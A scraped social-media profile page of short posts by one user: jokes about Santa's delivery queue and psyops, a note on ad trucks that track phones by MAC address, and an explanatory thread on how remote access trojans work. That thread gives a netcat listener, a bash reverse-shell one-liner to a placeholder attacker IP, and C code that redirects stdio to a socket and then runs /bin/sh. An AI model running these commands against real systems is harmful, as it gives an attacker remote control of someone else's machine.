Advertisement · 728 × 90

Posts by drop table users

Simplified example: I see an ad for Dove shampoo on a delivery truck. The truck captures the MAC address of my phone. Later on I’m at Target and buy Dove shampoo, instead of Axe. Cross referencing my Target rewards with the MAC address, Dove infers the campaign was effective. (2/2)

1 year ago 0 0 0 0

TIL: Some delivery trucks that display ads aren’t actually making deliveries. Instead they are marketing campaigns that use WiFi beacons to track your device’s MAC address + location for targeting purposes. (1/2)

1 year ago 2 0 1 0

spinach is a scam

1 year ago 4 0 0 0

So… if Canada becomes a US state, how many electoral votes does it get?

Will probably make it difficult for Republicans to retain the presidency, especially when Canadians all lose their healthcare.

1 year ago 298 29 27 4

@proton.me second major protonmail outage in a month and i missed the link to join an interview 😔

1 year ago 5 0 0 0

implement “quick access” and i’ll make the switch from 1pass

1 year ago 0 0 0 0

at approx. 12:00PM (UTC+10) we will start scaling up santa pods (clones of original santa process) across geos- this will ensure efficient and sustainable present delivery

1 year ago 0 0 0 0
Advertisement

instead of a linear delivery route (NPOLE => DEST) present caches should be established across geos

1 year ago 0 0 1 0

the toy production process is sufficiently distributed with scaling worker pods (elves), however the santa delivery sleigh is very inefficient and must be optimized

1 year ago 0 0 1 0

systems design interview but it’s for santa’s delivery queue on xmas eve

1 year ago 1 0 1 0
The TLS Protocol Version 1.0 RFC, January 1999, in ugly meme form.

Top text:
I am not a toy
I am not a Christmas present
I am a 30+ years commitment

Bottom text:
Please think hard before you give someone
an Internet standard this Christmas

The TLS Protocol Version 1.0 RFC, January 1999, in ugly meme form. Top text: I am not a toy I am not a Christmas present I am a 30+ years commitment Bottom text: Please think hard before you give someone an Internet standard this Christmas

1 year ago 1110 214 6 3

TIL everything is a psyop

1 year ago 2 0 0 0

spy kids (2001) was a cia psyop just check out cia.gov/spy-kids

1 year ago 0 0 0 0

spotify wrapped is a cia psyop to reinforce the surveillance state 🤷‍♂️

1 year ago 0 0 0 0

this basically aliases all the standard streams to the socket to provide the attacker an interactive shell to the victims machine.

full write-up here: jackcarrick.net/blog/reverse...

1 year ago 2 0 0 0

because “everything is a file” in unix systems you can do the same redirection with a networking socket

int socket
...
dup2(socket, STDIN_FILENO);
dup2(socket, STDOUT_FILENO);
dup2(socket, STDERR_FILENO);

Then execute a shell
execve("/bin/sh", argv, NULL);

1 year ago 1 0 1 0
Advertisement

so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo “foo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)

1 year ago 0 0 1 0

upon connecting to the server an attacker can input commands into the victims shell as if it were their own more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start

1 year ago 0 0 1 0

curious how malware like remote access trojans (RATs) work? turns out you can create a very basic one with two commands:

attacker runs a TCP server:
nc -nlp 4444

victim connects to the server:
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1

this is called a reverse shell

1 year ago 6 0 1 0

so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo “foo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)

1 year ago 0 0 0 0

upon connecting to the server an attacker can input commands into the victims shell as if it were their own

more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start

1 year ago 0 0 1 0